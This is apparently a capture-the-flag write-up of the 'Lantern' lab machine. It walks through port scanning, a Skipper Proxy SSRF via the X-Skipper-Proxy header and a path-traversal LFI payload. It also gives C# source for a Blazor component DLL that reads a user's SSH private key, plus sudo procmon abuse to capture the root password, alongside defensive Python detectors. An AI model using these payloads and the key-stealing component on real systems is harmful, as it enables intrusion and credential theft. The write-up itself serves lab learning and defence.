Lantern
My writeup of the Lantern machine from Season 6.

Enumeration
Starting with rustscan, I see port 3000 open with a login page, port 80 with a default web page, and port 22 for SSH. We can test each of these services while waiting for nmap to scan deeper.
Result from nmap:
nmap -A -T4 -sC -sV -p- 10.10.11.29
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-18 09:22 +07
Warning: 10.10.11.29 giving up on port because retransmission cap hit (6).
Stats: 0:07:20 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 49.62% done; ETC: 09:36 (0:07:27 remaining)
Stats: 0:07:21 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 49.63% done; ETC: 09:36 (0:07:27 remaining)
Stats: 0:11:53 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 70.73% done; ETC: 09:38 (0:04:55 remaining)
Stats: 0:16:19 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 93.34% done; ETC: 09:39 (0:01:10 remaining)
Stats: 0:18:15 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 09:40 (0:00:22 remaining)
Nmap scan report for lantern.htb (10.10.11.29)
Host is up (0.060s latency).
Not shown: 65132 closed tcp ports (conn-refused), 401 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 80:c9:47:d5:89:f8:50:83:02:5e:fe:53:30:ac:2d:0e (ECDSA)
|_ 256 d4:22:cf:fe:b1:00:cb:eb:6d:dc:b2:b4:64:6b:9d:89 (ED25519)
80/tcp open http Skipper Proxy
|_http-server-header: Skipper Proxy
|_http-title: Lantern
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Not Found
| Content-Length: 207
| Content-Type: text/html; charset=utf-8
| Date: Sun, 18 Aug 2024 02:30:57 GMT
| Server: Skipper Proxy
| <!doctype html>
| <html lang=en>
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Content-Length: 225
| Content-Type: text/html; charset=utf-8
| Date: Sun, 18 Aug 2024 02:30:51 GMT
| Location: http://lantern.htb/
| Server: Skipper Proxy
| <!doctype html>
| <html lang=en>
| <title>Redirecting...</title>
| <h1>Redirecting...</h1>
| <p>You should be redirected automatically to the target URL: <a href="http://lantern.htb/">http://lantern.htb/</a>. If not, click the link.
| HTTPOptions:
| HTTP/1.0 200 OK
| Allow: GET, OPTIONS, HEAD
| Content-Length: 0
| Content-Type: text/html; charset=utf-8
| Date: Sun, 18 Aug 2024 02:30:51 GMT
|_ Server: Skipper Proxy
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94SVN%I=7%D=8/18%Time=66C15F08%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,18F,"HTTP/1\.0\x20302\x20Found\r\nContent-Length:\x20225\r\nC
SF:ontent-Type:\x20text/html;\x20charset=utf-8\r\nDate:\x20Sun,\x2018\x20A
SF:ug\x202024\x2002:30:51\x20GMT\r\nLocation:\x20http://lantern\.htb/\r\nS
SF:erver:\x20Skipper\x20Proxy\r\n\r\n<!doctype\x20html>\n<html\x20lang=en>
SF:\n<title>Redirecting\.\.\.</title>\n<h1>Redirecting\.\.\.</h1>\n<p>You\
SF:x20should\x20be\x20redirected\x20automatically\x20to\x20the\x20target\x
SF:20URL:\x20<a\x20href=\"http://lantern\.htb/\">http://lantern\.htb/</a>\
SF:.\x20If\x20not,\x20click\x20the\x20link\.\n")%r(HTTPOptions,A5,"HTTP/1\
SF:.0\x20200\x20OK\r\nAllow:\x20GET,\x20OPTIONS,\x20HEAD\r\nContent-Length
SF::\x200\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nDate:\x20Sun,
SF:\x2018\x20Aug\x202024\x2002:30:51\x20GMT\r\nServer:\x20Skipper\x20Proxy
SF:\r\n\r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCont
SF:ent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r
SF:\n400\x20Bad\x20Request")%r(FourOhFourRequest,162,"HTTP/1\.0\x20404\x20
SF:Not\x20Found\r\nContent-Length:\x20207\r\nContent-Type:\x20text/html;\x
SF:20charset=utf-8\r\nDate:\x20Sun,\x2018\x20Aug\x202024\x2002:30:57\x20GM
SF:T\r\nServer:\x20Skipper\x20Proxy\r\n\r\n<!doctype\x20html>\n<html\x20la
SF:ng=en>\n<title>404\x20Not\x20Found</title>\n<h1>Not\x20Found</h1>\n<p>T
SF:he\x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20server\.\
SF:x20If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x20check\x2
SF:0your\x20spelling\x20and\x20try\x20again\.</p>\n")%r(GenericLines,67,"H
SF:TTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20ch
SF:arset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(He
SF:lp,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plai
SF:n;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Reques
SF:t")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T
SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400
SF:\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1\.1\x20400\x20Bad
SF:\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnect
SF:ion:\x20close\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1166.77 seconds
Accessing the web server shows that it is served through Skipper Proxy and the web platform is Blazor; Skipper Proxy may contain an SSRF vulnerability.
The exploit for this vulnerability is on Exploit-DB: https://www.exploit-db.com/exploits/51111
The vulnerability lets us reach URLs without authentication by adding a specific header (X-Skipper-Proxy) to the HTTP request.
From the enumeration, the discovered path shows that the web server also contains an LFI vulnerability, which should give us a lot of sensitive data for later testing.
LFI:
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/combined_directories.txt -u http://lantern.htb/FUZZ -t 100
This command only finds the path "PrivacyAndPolicy". To get further, try LFI wordlists and Burp Suite to find the vulnerable parameter.
Discovered at: http://lantern.htb/PrivacyAndPolicy?lang=../../../../etc/host&ext=conf
It takes at least 30 minutes to scan through this path.

Keep going with this and you will get the content of app.py and some other useful files.
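Since app.py itself is not reproduced in this writeup, here is an added Python example (my own code, not the machine's) of the pattern behind a lang/ext style LFI: the unsafe path concatenation beside a hardened resolver, plus a small detector that flags traversal attempts in the lang/ext parameters of constructed access-log lines. The base directory, the allow-lists and the log lines are assumptions made for the example.

```python
import os
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Hypothetical document root for the example; the real app.py is not shown on the page.
BASE_DIR = "/var/www/sites/lantern.htb/static/i18n"
ALLOWED_EXT = {"conf", "json"}              # assumed allow-list of extensions
LANG_RE = re.compile(r"^[a-z]{2}(?:-[A-Z]{2})?$")  # e.g. "en", "en-US"


def build_path_unsafe(lang: str, ext: str, base_dir: str = BASE_DIR) -> str:
    """Vulnerable pattern: request parameters concatenated straight into a path.
    lang='../../../../etc/hosts' with ext='conf' escapes base_dir entirely."""
    return f"{base_dir}/{lang}.{ext}"


def resolve_lang_file(lang: str, ext: str, base_dir: str = BASE_DIR):
    """Hardened version: allow-list both parameters, then verify that the
    canonical path is still inside base_dir. Returns None when rejected."""
    if ext not in ALLOWED_EXT or not LANG_RE.match(lang):
        return None
    candidate = os.path.realpath(os.path.join(base_dir, f"{lang}.{ext}"))
    root = os.path.realpath(base_dir)
    # commonpath (not startswith) so that base_dir + "_evil" cannot slip through
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


TRAVERSAL_RE = re.compile(r"(\.\./|\.\.\\|%2e%2e)", re.IGNORECASE)


def flag_traversal_requests(log_lines):
    """Detection side: return (client_ip, param, value) for access-log lines whose
    lang/ext parameters contain a traversal sequence. parse_qs already decodes one
    layer of URL encoding; unquote() catches a double-encoded payload as well."""
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 7:
            continue  # not in combined log format, skip
        client, target = parts[0], parts[6]
        query = parse_qs(urlsplit(target).query)
        for param in ("lang", "ext"):
            for value in query.get(param, []):
                if TRAVERSAL_RE.search(unquote(value)):
                    hits.append((client, param, value))
    return hits


# Constructed sample log lines (combined log format); not taken from the machine.
SAMPLE_LOG = [
    '10.10.14.5 - - [18/Aug/2024:09:40:01 +0700] "GET /PrivacyAndPolicy?lang=en&ext=conf HTTP/1.1" 200 512',
    '10.10.14.5 - - [18/Aug/2024:09:41:12 +0700] "GET /PrivacyAndPolicy?lang=../../../../etc/hosts&ext=conf HTTP/1.1" 200 220',
    '10.10.14.9 - - [18/Aug/2024:09:42:33 +0700] "GET /PrivacyAndPolicy?lang=%2e%2e%2f%2e%2e%2fetc%2fpasswd&ext=conf HTTP/1.1" 200 1800',
]

if __name__ == "__main__":
    print("unsafe :", build_path_unsafe("../../../../etc/hosts", "conf"))
    print("safe   :", resolve_lang_file("../../../../etc/hosts", "conf"))
    for client, param, value in flag_traversal_requests(SAMPLE_LOG):
        print(f"traversal attempt from {client} in {param}={value}")
```

The regex allow-list is what actually stops the traversal; the realpath/commonpath check is a second layer in case the allow-list is loosened later.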

SSRF:
Ports 3000, 8000 and 5000 are often used by web applications or local services on the server. In this case, when checking for an SSRF (Server-Side Request Forgery) vulnerability through X-Skipper-Proxy, the goal is to send a request with an X-Skipper-Proxy header pointing to http://127.0.0.1:5000/ and see whether the proxy can be used to reach a local service running on the server.
Such a service is usually not exposed to the Internet and is only reachable from within the system (localhost). If the proxy is affected by an SSRF vulnerability, an attacker can use it to send requests to internal services that are normally not accessible from the outside.
Port 5000 is often the default port for web applications using Flask (a Python microframework) or other compatible services, so it is worth checking whether Skipper Proxy can be used to access a local service on this port.
If the request returns a response from port 5000, the proxy can be used to reach the internal service, which confirms that the SSRF vulnerability exists on the system.
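From the detection side, here is an added Python example (my code, not the writeup's and not part of Skipper) that parses a few constructed raw HTTP requests, flags any that carry an X-Skipper-Proxy header, classifies whether its target is a loopback/private address, and shows the edge-side mitigation of dropping that client-supplied header before the proxy sees it. The sample requests and the blocked-header list are assumptions.

```python
import ipaddress
from urllib.parse import urlsplit


def is_internal_target(url: str) -> bool:
    """True when the URL's host is loopback, private, link-local or reserved,
    i.e. an address a public-facing proxy should never be steered towards.
    Hostnames other than 'localhost' would need DNS resolution, which this
    offline example does not do, so they are reported as not internal."""
    host = urlsplit(url).hostname
    if host is None:
        return False
    if host == "localhost":
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_reserved


def parse_request(raw: bytes):
    """Minimal HTTP/1.x request parser: request line plus headers, header names
    lower-cased so the check is case-insensitive (as HTTP header names are)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def audit_requests(raw_requests):
    """Return one finding per request that carries X-Skipper-Proxy, noting whether
    the header points at an internal address (the SSRF pattern described above)."""
    findings = []
    for raw in raw_requests:
        method, target, headers = parse_request(raw)
        proxy_target = headers.get("x-skipper-proxy")
        if proxy_target is None:
            continue
        findings.append({
            "method": method,
            "target": target,
            "proxy_target": proxy_target,
            "internal": is_internal_target(proxy_target),
        })
    return findings


# Assumed list of headers an edge should never accept from untrusted clients.
BLOCKED_CLIENT_HEADERS = frozenset({"x-skipper-proxy"})


def strip_client_controlled_headers(headers: dict) -> dict:
    """Mitigation: drop proxy-control headers before forwarding to the backend proxy."""
    return {k: v for k, v in headers.items() if k.lower() not in BLOCKED_CLIENT_HEADERS}


# Constructed sample requests (not captured from the machine).
SAMPLE_REQUESTS = [
    b"GET / HTTP/1.1\r\nHost: lantern.htb\r\nUser-Agent: curl/8.0\r\n\r\n",
    b"GET / HTTP/1.1\r\nHost: lantern.htb\r\nX-Skipper-Proxy: http://127.0.0.1:5000/\r\n\r\n",
    b"GET / HTTP/1.1\r\nHost: lantern.htb\r\nx-skipper-proxy: http://example.com/\r\n\r\n",
]

if __name__ == "__main__":
    for finding in audit_requests(SAMPLE_REQUESTS):
        print(finding)
```

Alerting on any X-Skipper-Proxy header from the Internet is the simpler rule; the internal/external split is there so a triage queue can prioritise the requests that actually aim at loopback or RFC 1918 space.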
Note
The _framework directory is specific to certain web application frameworks, particularly Blazor applications in ASP.NET Core, which is what we find here. _framework is a directory commonly seen in Blazor applications, which are part of the ASP.NET Core framework developed by Microsoft. Blazor allows developers to build interactive web applications using C# instead of JavaScript. When scanning the /_framework/ directory of a Blazor or ASP.NET Core application, it makes sense to focus on the .dll file extension.
But unfortunately none of my wordlists found the correct .dll file there.
From the LFI we discover /_framework/InternaLantern.dll. Download this file and analyze it with dotPeek or ILSpy. Remember to add the X-Skipper-Proxy header: do it with Burp Suite, add the header X-Skipper-Proxy with the localhost IP and port 5000 (found from testing), and forward the request to get the file.

Using dotPeek makes analyzing files written in .NET much easier:

On port 3000 we can log in as admin with that password:

User
With the upload content module we need to change the path to /opt/components/; by default it uploads to "Upload directory /var/www/sites/lantern.htb/static/images", as in the picture I captured above.
A Burp Suite extension helps with this: https://portswigger.net/bappstore/8a87b0d9654944ccbdf6ae8bdd18e1d4
Download it from the link or from within Burp Suite:

The menu after a successful install:

So the server framework is .NET; upload a DLL file to trigger it through the file upload vulnerability:
Make the .dll file for the exploit first. We could try something like a reverse shell; for brevity I will grab the SSH key (which exists):
using Microsoft.AspNetCore.Components;
using Microsoft.AspNetCore.Components.Rendering;
using System.IO;

namespace exploit
{
    public class Component : ComponentBase
    {
        protected override void BuildRenderTree(RenderTreeBuilder builder)
        {
            base.BuildRenderTree(builder);
            // Read the content of the sensitive file
            string file = File.ReadAllText("/home/tomas/.ssh/id_rsa");
            // Add the content to the render tree
            builder.AddContent(0, file);
        }
    }
}
Why tomas? The name comes from tracing around the server with the LFI; we also find an email message from tomas that will help with root (later) (var/tomas/mails).
Step by step build:
1. Create a new class library:
Open your terminal and run the following command to create a new class library project:
dotnet new classlib -n exploit
This creates a new directory named exploit with the basic files for a class library project.
2. Navigate to the project directory:
Change to the newly created exploit directory:
cd exploit
3. Add the necessary package:
Add the required package for Blazor components:
dotnet add package Microsoft.AspNetCore.Components --version 6.0.0
This adds the Microsoft.AspNetCore.Components package to your project, which is necessary for creating the Blazor component.
4. Modify the Class1.cs file:
Open Class1.cs in a text editor, replace its content with the code given above, and save the file.
5. Build the project:
Build the project in Release mode:
dotnet build -c Release
This compiles the code and generates exploit.dll in the bin/Release/net6.0/ directory.
After this we have the file; now upload it to the server.

Upload it and send the request to the BTP tab.
Deserialize the input, change the value of the name field using the LFI recon, then copy it and convert from JSON -> Blazor.


Serialize it:

Copy it and overwrite the request in the proxy tab:

Output successful:

Search for this module (the uploaded file name is the module to search for) and you will get the id_rsa key:

Now copy the id_rsa key, set its permissions (600) and use it to connect over SSH; this gives the user flag as tomas.
Root
sudo -l gives a first look:

We see (ALL : ALL) NOPASSWD: /usr/bin/procmon
It can be run with sudo, so check the processes now:

ps: Displays information about running processes.
-a: Displays all processes related to all users, not just the current user's processes.
-e: Similar to -a, but lists all processes running on the system.
-f: Displays full-format listing, including PID (Process ID), PPID (Parent Process ID), UID (User ID), status, creation time, and full command.

sudo /usr/bin/procmon -p pid_of_process_in_picture -e write
Wait a few minutes and hit F6; it will export a db file in the current directory. Transfer this to the attack machine, then open it.

Transfer it to the attack machine:

Open it with sqlite3 to grab some information:

From here, look through all the tables and data. To make it easier I focus on resultcode, which could be the result or status code returned by a system call or function.

There are a lot of commands here, so it takes a while to trace them. I put the commands in another file to analyze them, extracted with this SQL command:
SELECT hex(substr(arguments, 9, resultcode))
FROM ebpf
WHERE resultcode > 0
ORDER BY timestamp;
Decode it from hex, since all the extracted commands were hex-encoded (this is just to be sure the copy is correct, so I suggest encoding as hex for easier copying):

Download it from CyberChef after decoding; basically you will see a command like: echo Q 33EEddddttddww33ppMMB
Remove the duplicates and you get the root password:
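To show what ends up in the procmon database, and why a NOPASSWD sudo rule for procmon is effectively a credential leak for every other user's terminal, here is an added Python example (my own code, not from the writeup or from procmon) that builds a constructed in-memory SQLite table mimicking the timestamp/resultcode/arguments columns of the ebpf table, runs the same query as above, decodes the hex and removes duplicate lines. The real procmon schema has more columns, and the 8-byte file-descriptor prefix before the buffer is my assumption matching the substr(arguments, 9, ...) offset used in the query; the captured text is a constructed placeholder.

```python
import sqlite3
import struct

# The same query the writeup runs against the exported procmon database.
QUERY = """
SELECT hex(substr(arguments, 9, resultcode))
FROM ebpf
WHERE resultcode > 0
ORDER BY timestamp
"""


def make_sample_db() -> sqlite3.Connection:
    """Constructed stand-in for the exported procmon DB. Only the columns the
    query needs are modelled. Each write() row stores an assumed 8-byte fd
    followed by the buffer; resultcode is the byte count the syscall returned,
    so a failed write has a negative resultcode and no payload."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE ebpf (timestamp INTEGER, syscall TEXT, resultcode INTEGER, arguments BLOB)"
    )
    # A shell writing a command (with its secret argument) twice, then 'ls'.
    chunks = [b"echo ", b"CONSTRUCTED_SECRET", b"\n",
              b"echo ", b"CONSTRUCTED_SECRET", b"\n",
              b"ls\n"]
    rows = [(ts, "write", len(buf), struct.pack("<q", 1) + buf)
            for ts, buf in enumerate(chunks, 1)]
    # EBADF-style failure: filtered out by resultcode > 0 in the query.
    rows.append((len(chunks) + 1, "write", -9, struct.pack("<q", 7)))
    con.executemany("INSERT INTO ebpf VALUES (?, ?, ?, ?)", rows)
    return con


def extract_written_bytes(con: sqlite3.Connection) -> bytes:
    """Run the query and turn the hex column back into the raw written bytes,
    in timestamp order, so split writes are reassembled into one stream."""
    return b"".join(bytes.fromhex(h) for (h,) in con.execute(QUERY))


def unique_commands(data: bytes) -> list:
    """Split the reassembled stream into lines and drop duplicates, keeping order."""
    seen = []
    for line in data.decode("utf-8", "replace").splitlines():
        if line and line not in seen:
            seen.append(line)
    return seen


if __name__ == "__main__":
    con = make_sample_db()
    for cmd in unique_commands(extract_written_bytes(con)):
        print(cmd)
```

Ordering by timestamp matters: write() payloads arrive split across several rows, so decoding each row in isolation gives fragments, while concatenating them in order gives back the typed command lines. The defensive takeaway is that any tool able to trace other users' syscalls needs to be treated like root, not handed out with NOPASSWD.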

